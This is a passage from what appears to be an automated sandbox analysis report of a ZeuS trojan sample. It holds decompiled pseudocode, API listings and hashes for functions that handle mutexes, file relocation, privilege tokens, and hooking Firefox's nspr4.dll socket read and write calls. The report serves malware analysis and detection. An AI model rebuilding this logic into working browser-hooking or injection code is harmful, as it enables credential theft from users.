				long _t85;
				signed int _t89;
				signed int _t98;
				signed int _t101;
				signed int _t108;
				signed int _t110;
				WCHAR* _t123;
				signed char _t125;
				signed char* _t131;
				signed int _t134;
				void* _t136;
				void* _t140;
				signed int _t141;

				_t128 = __ecx;
				_t131 = _a4;
				_t60 = E0041C97E(__ecx, (0 |  *_t131 != 0x00000000) + 0x78d0c214, 2);
				_v1652 = _t60;
				if(_t60 != 0) {
					_v1628 =  *0x423e74;
					_v1624 =  &_v268;
					_v1636 = E00418018;
					_v1632 = E00418154;
					_v1616 = _t131;
					E0041CC1D( &_v1084);
					E00405222( &_v268,  &_v737, 0x102);
					_t69 =  *_t131 & 0x000000ff;
					__eflags = _t69;
					if(_t69 == 0) {
						_t71 = _v320 >> 0x10;
						__eflags = _t71;
						_v1652 = _t71;
						_t72 = _v320 & 0x0000ffff;
						goto L7;
					} else {
						__eflags = _t69 == 1;
						if(_t69 == 1) {
							_v1652 = _v940 >> 0x10;
							_t72 = _v940 & 0x0000ffff;
							L7:
							_v1648 = _t72;
						}
					}
					_v1652 = _v1652 * 0xea60;
					_v1648 = _v1648 * 0xea60;
					E00405299( &_v1084,  &_v1084, 0, 0x32c);
					_v1616 = 0;
					_t80 = E0041CAA4();
					__eflags = _t80;
					if(_t80 != 0) {
						do {
							__eflags =  *_t131;
							_v1653 = 1;
							if( *_t131 != 0) {
								L24:
								_t83 = E0040BABC();
								_t138 = _t83;
								__eflags = _t83;
								if(__eflags == 0) {
									goto L29;
								} else {
									_v1652 = E0040AD5E(0, _t129, __eflags, _t138, 0x4e23, 0x10000000);
									E004051E6(_t138);
									__eflags = _v1656;
									if(_v1656 == 0) {
										_t131 = _a4;
										goto L33;
									} else {
										_v1620 = _v1620 & 0;
										_t108 = E00417DDC(_t128, _t129,  &_v1620, 1);
										_t131 = _a4;
										__eflags = _t108;
										if(_t108 == 0) {
											L33:
											_t125 = _v1653;
										} else {
											_t131[8] = _t131[8] | 0xffffffff;
											_t110 = E004185D9( &_v1640);
											__eflags = _t110;
											_t125 = (0 | _t110 != 0x00000000) - 0x00000001 & 0x00000002;
											E0040B18B( &(_t131[8]));
											E004051E6(_v1620);
										}
									}
									E004051E6(_v1640);
									__eflags = _t125 - 2;
									if(_t125 != 2) {
										__eflags = _t125;
										if(_t125 != 0) {
											goto L29;
										} else {
											_t84 = _v1652;
										}
									} else {
										_t84 = _v1648;
									}
								}
							} else {
								asm("sbb ebx, ebx");
								E00417C9B( !( ~(_v1604 & 0x0000ffff)) &  &_v1604, _t128, 0);
								_t123 =  &(_t131[0x122]);
								_t89 = GetFileAttributesW( &_v1608);
								__eflags = _t89 - 0xffffffff;
								if(_t89 == 0xffffffff) {
									_t89 = GetFileAttributesW(0x423460);
									__eflags = _t89 - 0xffffffff;
									if(_t89 == 0xffffffff) {
										goto L29;
									} else {
										_t128 = 0x423460;
										goto L14;
									}
								} else {
									_t128 =  &_v1604;
									L14:
									_t129 = _t123;
									E00405587(_t89 | 0xffffffff, _t128, _t129);
									_t140 = CreateFileW(_t123, 0x80000000, 7, 0, 3, 0, 0);
									__eflags = _t140 - 0xffffffff;
									if(_t140 == 0xffffffff) {
										L28:
										E0040A548(_t123);
										goto L29;
									} else {
										_v1616 = E0040A521(_t128, _t140);
										_t134 = _t129;
										CloseHandle(_t140);
										__eflags = _v1616 - 0xffffffff;
										if(_v1616 != 0xffffffff) {
											L17:
											__eflags = _t134;
											if(__eflags > 0) {
												goto L28;
											} else {
												if(__eflags < 0) {
													L20:
													_t98 = lstrcmpiW(_t123,  &_v1604);
													__eflags = _t98;
													if(_t98 == 0) {
														goto L24;
													} else {
														_t141 = E0041C97E(_t128, 0x8793aef2, 2);
														__eflags = _t141;
														if(_t141 == 0) {
															L29:
															_t131 = _a4;
															_t84 = 0x7530;
														} else {
															_t101 = MoveFileExW(_t123,  &_v1604, 0xb);
															__eflags = _t101;
															if(_t101 == 0) {
																goto L29;
															} else {
																E004089B9(_t141);
																__eflags = _t101 | 0xffffffff;
																_t128 =  &_v1608;
																_t129 = _t123;
																E00405587(_t101 | 0xffffffff,  &_v1608, _t123);
																goto L24;
															}
														}
													}
												} else {
													__eflags = _v1612 - 0xffffffff;
													if(_v1612 > 0xffffffff) {
														goto L28;
													} else {
														goto L20;
													}
												}
											}
										} else {
											__eflags = _t134;
											if(_t134 == 0) {
												goto L28;
											} else {
												goto L17;
											}
										}
									}
								}
							}
							_t85 = WaitForSingleObject( *0x423e74, _t84);
							__eflags = _t85 - 0x102;
						} while (_t85 == 0x102);
					}
					E004089B9(_v1644);
					_t136 = 0;
				} else {
					_t136 = 1;
				}
				E004051E6(_t131);
				return _t136;
			}

0x004181bc
0x004181cb
0x004181df
0x004181e4
0x004181ea
0x00418205
0x00418210
0x0041821b
0x00418223
0x0041822b
0x0041822f
0x00418249
0x00418251
0x00418251
0x00418253
0x00418277
0x00418277
0x0041827a
0x0041827e
0x00000000
0x00418255
0x00418255
0x00418256
0x00418262
0x00418266
0x00418286
0x00418286
0x00418286
0x00418256
0x00418294
0x004182a7
0x004182b4
0x004182bb
0x004182c0
0x004182c5
0x004182c7
0x004182cd
0x004182cd
0x004182d0
0x004182d5
0x004183d5
0x004183d5
0x004183da
0x004183dc
0x004183de
0x00000000
0x004183e0
0x004183f3
0x004183f7
0x004183fc
0x00418400
0x00418478
0x00000000
0x00418402
0x00418402
0x0041840d
0x00418412
0x00418415
0x00418417
0x0041847b
0x0041847b
0x00418419
0x0041841c
0x00418423
0x00418428
0x0041842f
0x00418432
0x0041843b
0x0041843b
0x00418417
0x00418483
0x00418488
0x0041848b
0x00418493
0x00418495
0x00000000
0x00418497
0x00418497
0x00418497
0x0041848d
0x0041848d
0x0041848d
0x0041848b
0x004182db
0x004182e2
0x004182ee
0x004182fe
0x00418304
0x00418306
0x00418309
0x00418317
0x00418319
0x0041831c
0x00000000
0x00418322
0x00418322
0x00000000
0x00418322
0x0041830b
0x0041830b
0x00418324
0x00418327
0x00418329
0x00418343
0x00418345
0x00418348
0x00418442
0x00418443
0x00000000
0x0041834e
0x00418355
0x00418359
0x0041835b
0x00418361
0x00418366
0x00418370
0x00418370
0x00418372
0x00000000
0x00418378
0x00418378
0x00418385
0x0041838b
0x00418391
0x00418393
0x00000000
0x00418395
0x004183a1
0x004183a3
0x004183a5
0x00418448
0x00418448
0x0041844b
0x004183ab
0x004183b3
0x004183b9
0x004183bb
0x00000000
0x004183c1
0x004183c2
0x004183c7
0x004183ca
0x004183ce
0x004183d0
0x00000000
0x004183d0
0x004183bb
0x004183a5
0x0041837a
0x0041837a
0x0041837f
0x00000000
0x00000000
0x00000000
0x00000000
0x0041837f
0x00418378
0x00418368
0x00418368
0x0041836a
0x00000000
0x00000000
0x00000000
0x00000000
0x0041836a
0x00418366
0x00418348
0x00418309
0x00418457
0x0041845d
0x0041845d
0x004182cd
0x0041846c
0x00418471
0x004181ec
0x004181ee
0x004181ee
0x004181f0
0x004181fd

APIs

Part of subcall function 0041C97E: CreateMutexW.KERNEL32(004239E8,00000000,?,?,?,?,?), ref: 0041C99F

GetFileAttributesW.KERNEL32(?,00000000,?,00000000,0000032C,?,?,00000102), ref: 00418304
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 0041833D
CloseHandle.KERNEL32(00000000,00000000), ref: 0041835B
lstrcmpiW.KERNEL32(?,?), ref: 0041838B

Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9

Strings

`4B, xrefs: 00418311

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CreateFile$AttributesCloseFreeHandleHeapMutexlstrcmpi
String ID: `4B
API String ID: 503543330-2490286457
Opcode ID: 72f20910d252530821ed3b0f99a47f7b2f322876809adaaeec104fa8e1de4b1b
Instruction ID: 004af7308ddd7e556b63512ca4e197fda8bf38736f629d8d9d06e4336c749f34
Opcode Fuzzy Hash: 72f20910d252530821ed3b0f99a47f7b2f322876809adaaeec104fa8e1de4b1b
Instruction Fuzzy Hash: 1B71A2715083459BD7209F74CC81AAFB7E8EF85324F140A2EB594A62D1EF38C9858B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00419BAF, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00419BAF(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				char _v92;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				void* _t25;
				long _t27;
				void* _t28;
				long _t29;
				void* _t33;
				void* _t39;
				void* _t41;
				void* _t44;
				long _t49;
				void* _t50;
				void* _t57;
				void* _t62;
				void* _t69;
				void* _t73;
				WCHAR* _t77;
				void* _t78;
				void* _t80;
				void* _t82;

				_t73 = __edx;
				_t70 = __ecx;
				_t22 = E0041C97E(__ecx, 0x743c1521, 2);
				_v28 = _t22;
				if(_t22 != 0) {
					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
					_t25 = E0041CAA4();
					__eflags = _t25;
					if(_t25 == 0) {
						L24:
						E004089B9(_v28);
						__eflags = 0;
						return 0;
					}
					_t27 = WaitForSingleObject( *0x423e74, 0xea60);
					__eflags = _t27 - 0x102;
					if(_t27 != 0x102) {
						goto L24;
					}
					do {
						_t28 = E0041D6DE(_t70);
						_v24 = _t28;
						__eflags = _t28;
						if(__eflags == 0) {
							goto L22;
						}
						_t80 = E0040AD5E( &_v16, _t73, __eflags, _t28, 2, 0x20000000);
						_v20 = _t80;
						__eflags = _t80;
						if(__eflags == 0) {
							L21:
							E004051E6(_v20);
							E004051E6(_v24);
							goto L22;
						}
						_t70 = _v16;
						_t33 = E00419644(_v16, __eflags, _t80);
						__eflags = _t33;
						if(_t33 == 0) {
							goto L21;
						} else {
							goto L8;
						}
						do {
							L8:
							_v8 = E004060B6(_t80, 1);
							_v12 = E004060B6(_t80, 2);
							_t39 = E00406595(_t80, E00405D23(_t80));
							_t72 = _v8;
							_t41 = E00406595(_t72, E00405D23(_v8));
							_t70 = _v12;
							_push(E00406595(_t70, E00405D23(_v12)));
							_push(_t41);
							_push(_t39);
							_push(L"Global\\%08X%08X%08X");
							_t73 = 0x20;
							_t77 =  &_v92;
							_t44 = E00405ED9(_t43, _t73, _t77);
							_t82 = _t82 + 0x10;
							__eflags = _t44 - 0x1f;
							if(_t44 != 0x1f) {
								goto L20;
							}
							_t69 = CreateMutexW(0x4239e8, 1, _t77);
							__eflags = _t69;
							if(_t69 == 0) {
								goto L20;
							}
							_t49 = GetLastError();
							__eflags = _t49 - 0xb7;
							if(_t49 == 0xb7) {
								CloseHandle(_t69);
								_t69 = 0;
								__eflags = 0;
							}
							__eflags = _t69;
							if(_t69 != 0) {
								_t50 = 0x10;
								_t78 = E004051B6(_t50);
								__eflags = _t78;
								if(_t78 == 0) {
									L19:
									E004089B9(_t69);
									goto L20;
								}
								 *_t78 = E00405644(_t51 | 0xffffffff, _t80);
								 *(_t78 + 4) = E00405644(_t53 | 0xffffffff, _v8);
								_t57 = E00405644(_t55 | 0xffffffff, _v12);
								__eflags =  *_t78;
								 *(_t78 + 8) = _t57;
								 *(_t78 + 0xc) = _t69;
								if( *_t78 == 0) {
									L18:
									E004051E6( *_t78);
									E004051E6( *(_t78 + 4));
									E004051E6( *(_t78 + 8));
									E004051E6(_t78);
									goto L19;
								}
								__eflags =  *(_t78 + 4);
								if( *(_t78 + 4) == 0) {
									goto L18;
								}
								__eflags = _t57;
								if(_t57 == 0) {
									goto L18;
								}
								_t62 = E00406C1B(0x80000, E00419904, _t78);
								__eflags = _t62;
								if(_t62 != 0) {
									goto L20;
								}
								goto L18;
							}
							L20:
							_t80 = E004060B6(_t80, 3);
							__eflags = _t80;
						} while (_t80 != 0);
						goto L21;
						L22:
						_t29 = WaitForSingleObject( *0x423e74, 0xea60);
						__eflags = _t29 - 0x102;
					} while (_t29 == 0x102);
					goto L24;
				}
				return _t22 + 1;
			}

0x00419baf
0x00419baf
0x00419bbc
0x00419bc1
0x00419bc6
0x00419bd7
0x00419bdd
0x00419be2
0x00419be4
0x00419da2
0x00419da5
0x00419daa
0x00000000
0x00419daa
0x00419bf5
0x00419bfb
0x00419c00
0x00000000
0x00000000
0x00419c09
0x00419c09
0x00419c0e
0x00419c11
0x00419c13
0x00000000
0x00000000
0x00419c29
0x00419c2b
0x00419c2e
0x00419c30
0x00419d73
0x00419d76
0x00419d7e
0x00000000
0x00419d7e
0x00419c36
0x00419c3a
0x00419c3f
0x00419c41
0x00000000
0x00000000
0x00000000
0x00000000
0x00419c47
0x00419c47
0x00419c50
0x00419c5e
0x00419c68
0x00419c6d
0x00419c79
0x00419c7e
0x00419c8f
0x00419c90
0x00419c91
0x00419c92
0x00419c99
0x00419c9a
0x00419c9d
0x00419ca2
0x00419ca5
0x00419ca8
0x00000000
0x00000000
0x00419cbe
0x00419cc0
0x00419cc2
0x00000000
0x00000000
0x00419cc8
0x00419cce
0x00419cd3
0x00419cd6
0x00419cdc
0x00419cdc
0x00419cdc
0x00419cde
0x00419ce0
0x00419ce4
0x00419cea
0x00419cec
0x00419cee
0x00419d5a
0x00419d5b
0x00000000
0x00419d5b
0x00419cfc
0x00419d09
0x00419d0f
0x00419d14
0x00419d17
0x00419d1a
0x00419d1d
0x00419d3d
0x00419d3f
0x00419d47
0x00419d4f
0x00419d55
0x00000000
0x00419d55
0x00419d1f
0x00419d23
0x00000000
0x00000000
0x00419d25
0x00419d27
0x00000000
0x00000000
0x00419d34
0x00419d39
0x00419d3b
0x00000000
0x00000000
0x00000000
0x00419d3b
0x00419d60
0x00419d69
0x00419d6b
0x00419d6b
0x00000000
0x00419d83
0x00419d8e
0x00419d94
0x00419d94
0x00000000
0x00419da1
0x00000000

APIs

Part of subcall function 0041C97E: CreateMutexW.KERNEL32(004239E8,00000000,?,?,?,?,?), ref: 0041C99F

GetCurrentThread.KERNEL32 ref: 00419BD0
SetThreadPriority.KERNEL32(00000000), ref: 00419BD7
WaitForSingleObject.KERNEL32(0000EA60), ref: 00419BF5
CreateMutexW.KERNEL32(004239E8,00000001,?,20000000), ref: 00419CB8
GetLastError.KERNEL32 ref: 00419CC8
CloseHandle.KERNEL32(00000000), ref: 00419CD6

Strings

Global\%08X%08X%08X, xrefs: 00419C92

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CreateMutexThread$CloseCurrentErrorHandleLastObjectPrioritySingleWait
String ID: Global\%08X%08X%08X
API String ID: 3448221409-3239447729
Opcode ID: e951496050d692263acd574b9c6f5ac67d831be933a3d2cc94b1b99489f5121c
Instruction ID: 54be597075d29ce6e8736a2ed35c06c4cc54f9377d57d07cb738b7f925317cb8
Opcode Fuzzy Hash: e951496050d692263acd574b9c6f5ac67d831be933a3d2cc94b1b99489f5121c
Instruction Fuzzy Hash: 3B41D270A006056BDB217BB2AD56BAF7669AF00718F10053BF511BA2D2DF7D8D908A9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C0E8, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040C0E8(void* __ecx, void* __eflags, void* _a4, void* _a8) {
				void* _v3;
				struct HINSTANCE__* _v8;
				void* _v12;
				void* _v16;
				_Unknown_base(*)()* _v20;
				signed int _v24;
				char _v40;
				char _v60;
				char _v84;
				char _v112;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t30;
				_Unknown_base(*)()* _t42;
				signed int _t44;
				signed int _t53;
				_Unknown_base(*)()* _t56;
				void* _t59;
				CHAR* _t62;
				CHAR* _t63;
				CHAR* _t64;
				_Unknown_base(*)()* _t65;
				WCHAR* _t67;
				void* _t69;

				_t59 = __ecx;
				_t67 =  &_v112;
				E0040F34A(0xdd, _t67);
				_t30 = LoadLibraryW(_t67);
				_v8 = _t30;
				if(_t30 != 0) {
					_t62 =  &_v84;
					E0040F314(0xde, _t62);
					_t56 = GetProcAddress(_v8, _t62);
					_t63 =  &_v40;
					E0040F314(0xdf, _t63);
					_v20 = GetProcAddress(_v8, _t63);
					_t64 =  &_v60;
					E0040F314(0xe0, _t64);
					_t42 = GetProcAddress(_v8, _t64);
					_t69 = 0;
					_t65 = _t42;
					if(_t56 == 0 || _v20 == 0 || _t65 == 0) {
						return FreeLibrary(_v8);
					} else {
						_t44 = E004068B2(L"SeTcbPrivilege");
						__imp__WTSGetActiveConsoleSessionId();
						_v24 = _t44;
						if (_t44 == 0xffffffff) goto L8;
						_t53 = _t44 | 0xff0c75ff;
					}
				}
				return _t30;
			}

0x0040c0e8
0x0040c0ef
0x0040c0f7
0x0040c0ff
0x0040c105
0x0040c10a
0x0040c112
0x0040c11a
0x0040c12d
0x0040c12f
0x0040c137
0x0040c144
0x0040c147
0x0040c14f
0x0040c15a
0x0040c15c
0x0040c15e
0x0040c162
0x00000000
0x0040c16d
0x0040c172
0x0040c177
0x0040c17d
0x0040c183
0x0040c184
0x0040c184
0x0040c162
0x0040c1ed

APIs

LoadLibraryW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040CA36,?,?), ref: 0040C0FF
GetProcAddress.KERNEL32(?,?), ref: 0040C12B
GetProcAddress.KERNEL32(?,?), ref: 0040C142
GetProcAddress.KERNEL32(?,?), ref: 0040C15A
FreeLibrary.KERNEL32(?,?,?,00000000), ref: 0040C1E3

Part of subcall function 004068B2: GetCurrentThread.KERNEL32 ref: 004068C2
Part of subcall function 004068B2: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040C177,SeTcbPrivilege), ref: 004068C9
Part of subcall function 004068B2: OpenProcessToken.ADVAPI32(000000FF,00000020,0040C177,?,?,?,?,0040C177,SeTcbPrivilege), ref: 004068DB

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,0040CA36,?,?,00000000), ref: 0040C177

Part of subcall function 0040C077: EqualSid.ADVAPI32(00000000,0040C1F0,?,0040C1F0,?,?,00000000), ref: 0040C09C
Part of subcall function 0040C077: CloseHandle.KERNEL32(?,?,0040C1F0,?,?,00000000), ref: 0040C0DD

Strings

SeTcbPrivilege, xrefs: 0040C16D
.exe, xrefs: 0040C111

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: AddressProc$LibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualFreeHandleLoadProcessSession
String ID: .exe$SeTcbPrivilege
API String ID: 1107370034-552748125
Opcode ID: 07a03a851cc29a47dc636d2024da1005c32f1dbd70bae0c5d51597395c6b15f2
Instruction ID: 7d2c241f2dd00e1f6f1db45960aa21102d85225c3a02adfb3840e92dd33ef4b9
Opcode Fuzzy Hash: 07a03a851cc29a47dc636d2024da1005c32f1dbd70bae0c5d51597395c6b15f2
Instruction Fuzzy Hash: BF316E35A00118EBDF11ABA4CC819AEBB79EB48354F144237F801FB291C7799E44DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041C41A, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C41A(void* __ecx, void* __edx, void* __eflags) {
				long _v8;
				signed int _v12;
				void _v532;
				void* __edi;
				void* __esi;
				unsigned int _t22;
				void* _t30;
				void* _t39;
				void* _t41;
				WCHAR* _t42;
				void* _t43;
				void* _t46;

				_t41 = __edx;
				_t39 = __ecx;
				InitializeCriticalSection(0x4223b8);
				 *0x4223ac = 0;
				 *0x4223b4 = 0;
				 *0x4223b0 = 0;
				 *0x4223a8 = 0;
				 *0x42341c = 0;
				 *0x423414 = 0;
				 *0x423418 = 0;
				InitializeCriticalSection(0x4233fc);
				_t42 =  &_v532;
				E0041CC9C(_t39, _t42, InitializeCriticalSection, 0);
				_v12 = _v12 | 0xffffffff;
				_v8 = 0x1fe;
				_t43 = CreateFileW(_t42, 0x80000000, 1, 0, 3, 0, 0);
				if(_t43 != 0xffffffff) {
					if(ReadFile(_t43,  &_v532, _v8,  &_v8, 0) != 0) {
						_v12 = _v8;
					}
					CloseHandle(_t43);
				}
				_t22 = _v12;
				if(_t22 == 0xffffffff || (_t22 & 0x00000001) != 0) {
					_t22 = 0;
				}
				 *((short*)(_t46 + (_t22 >> 1) * 2 - 0x210)) = 0;
				E00415ED6( &_v532);
				E0040F74E( &_v532);
				 *0x423440 = 0;
				 *0x42345c = 0;
				InitializeCriticalSection(0x423444);
				E0040D74C(_t41);
				if(GetModuleHandleW(L"nspr4.dll") == 0) {
					_t30 = 0;
				} else {
					_t30 = E0040E2A9(0, _t41, _t29);
				}
				if(_t30 != 0) {
					 *0x423888 =  *0x423888 | 0x00000001;
				}
				E0040E072();
				return 1;
			}

0x0041c41a
0x0041c41a
0x0041c431
0x0041c43c
0x0041c442
0x0041c448
0x0041c44e
0x0041c454
0x0041c45a
0x0041c460
0x0041c466
0x0041c469
0x0041c46f
0x0041c474
0x0041c487
0x0041c494
0x0041c499
0x0041c4b3
0x0041c4b8
0x0041c4b8
0x0041c4bc
0x0041c4bc
0x0041c4c2
0x0041c4c8
0x0041c4ce
0x0041c4ce
0x0041c4d4
0x0041c4e2
0x0041c4ed
0x0041c4f7
0x0041c4fd
0x0041c503
0x0041c505
0x0041c517
0x0041c522
0x0041c519
0x0041c51b
0x0041c51b
0x0041c526
0x0041c528
0x0041c528
0x0041c52f
0x0041c53a

APIs

InitializeCriticalSection.KERNEL32(004223B8,00000000,74B04EE0,00000000), ref: 0041C431
InitializeCriticalSection.KERNEL32(004233FC), ref: 0041C466

Part of subcall function 0041CC9C: PathRenameExtensionW.SHLWAPI(?,.dat,?,00423A10,00000032,77E49EB0,?,00000000), ref: 0041CD17

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 0041C48E
ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 0041C4AB
CloseHandle.KERNEL32(00000000), ref: 0041C4BC
InitializeCriticalSection.KERNEL32(00423444), ref: 0041C503
GetModuleHandleW.KERNEL32(nspr4.dll), ref: 0041C50F

Strings

nspr4.dll, xrefs: 0041C50A

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CriticalInitializeSection$FileHandle$CloseCreateExtensionModulePathReadRename
String ID: nspr4.dll
API String ID: 1155594396-741017701
Opcode ID: 529961c75d4cf5e28373da5eaafee238104501b8dcc043a87652e7ba16f2e976
Instruction ID: b425990ff73c83cacce3ae51245a2f6e25341662aad2668db5bcc9506d2b274c
Opcode Fuzzy Hash: 529961c75d4cf5e28373da5eaafee238104501b8dcc043a87652e7ba16f2e976
Instruction Fuzzy Hash: 2031A071640218BAC720EF79ADC5AEA7BB8BB04314F90057FE414E32A0D7785E868B5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E2A9, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 36
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040E2A9(void* __ecx, void* __edx, struct HINSTANCE__* __edi) {
				void* __ebx;
				_Unknown_base(*)()* _t4;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t12;

				_t12 = __edx;
				_t11 = __ecx;
				 *0x422348 = GetProcAddress(__edi, "PR_OpenTCPSocket");
				 *0x422358 = GetProcAddress(__edi, "PR_Close");
				 *0x422368 = GetProcAddress(__edi, "PR_Read");
				_t4 = GetProcAddress(__edi, "PR_Write");
				_push(0x422348);
				_t9 = 4;
				 *0x422378 = _t4;
				_t10 = E0040DFE1(_t9, _t11, _t12);
				if(_t10 != 0) {
					E0040F807(__edi,  *0x422350,  *0x422360,  *0x422370,  *0x422380);
				}
				return _t10;
			}

0x0040e2a9
0x0040e2a9
0x0040e2bf
0x0040e2cc
0x0040e2d9
0x0040e2de
0x0040e2e0
0x0040e2e7
0x0040e2e8
0x0040e2f2
0x0040e2f6
0x0040e312
0x0040e312
0x0040e31b

APIs

GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 0040E2B7
GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0040E2C4
GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0040E2D1
GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0040E2DE

Part of subcall function 0040DFE1: VirtualAllocEx.KERNEL32(000000FF,00000000,00000034,00003000,00000040,00000000,77E49EB0,?,?,0040E2A7,00422008,00000000,0041C534), ref: 0040E018

Part of subcall function 0040F807: InitializeCriticalSection.KERNEL32(004233D4,74B04EE0,0040E317,00422348), ref: 0040F81D
Part of subcall function 0040F807: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0040F859
Part of subcall function 0040F807: GetProcAddress.KERNEL32(PR_SetError), ref: 0040F86B
Part of subcall function 0040F807: GetProcAddress.KERNEL32(PR_GetError), ref: 0040F87D

Strings

PR_OpenTCPSocket, xrefs: 0040E2B1
PR_Close, xrefs: 0040E2B9
PR_Read, xrefs: 0040E2C6
PR_Write, xrefs: 0040E2D3

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: AddressProc$AllocCriticalInitializeSectionVirtual
String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
API String ID: 1833644279-3954199073
Opcode ID: 3b960e4304a581f6814d9db48bca70c3b943047324b32a7be9f0102f349e523b
Instruction ID: 57f34caad2da9e211d8cbbac476d0c24e2f0584a2acf4200671511a8da91c956
Opcode Fuzzy Hash: 3b960e4304a581f6814d9db48bca70c3b943047324b32a7be9f0102f349e523b
Instruction Fuzzy Hash: C8F09071B90350BACB309F76AD45E667FACB749B503A8007BB800A71F0D2FE4552DA1C

Uniqueness

Uniqueness Score: -1.00%

Function 0040FFF6, Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 247
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040FFF6(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed char _v32;
				char _v36;
				char _v40;
				signed int _v44;
				void* _v48;
				signed int _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t99;
				signed int _t100;
				signed int _t101;
				intOrPtr _t103;
				void* _t104;
				signed int _t107;
				signed int _t108;
				signed int _t110;
				intOrPtr _t119;
				void* _t131;
				signed int _t139;
				void* _t149;
				struct _CRITICAL_SECTION* _t153;
				intOrPtr _t155;
				signed int _t168;
				signed int _t174;
				char _t176;
				void* _t177;
				intOrPtr _t179;
				void* _t182;
				signed int _t183;
				intOrPtr _t186;
				void* _t188;
				signed int _t189;
				void* _t191;
				void* _t192;
				void* _t193;

				_t99 = E0041CAA4();
				_t179 = _a4;
				if(_t99 == 0 || _a8 == 0 || _a12 <= 0) {
					L40:
					_t100 =  *0x4233f8(_t179, _a8, _a12);
					goto L41;
				} else {
					_t153 = 0x4233d4;
					EnterCriticalSection(0x4233d4);
					_t101 = E0040F394(_t179);
					if(_t101 == 0xffffffff) {
						L39:
						LeaveCriticalSection(_t153);
						goto L40;
					}
					_t103 = _t101 * 0x38 +  *0x4233f0;
					if( *((intOrPtr*)(_t103 + 0x30)) > 0) {
						L32:
						_t182 =  *((intOrPtr*)(_t103 + 0x30)) -  *((intOrPtr*)(_t103 + 0x34));
						_t85 = _t103 + 0x2c; // -4338628
						_t173 = _t85;
						__eflags = _a12 - _t182;
						_t183 =  <  ? _a12 : _t182;
						_t104 = E00405222(_a8,  *_t85 +  *((intOrPtr*)(_t103 + 0x34)), _t183);
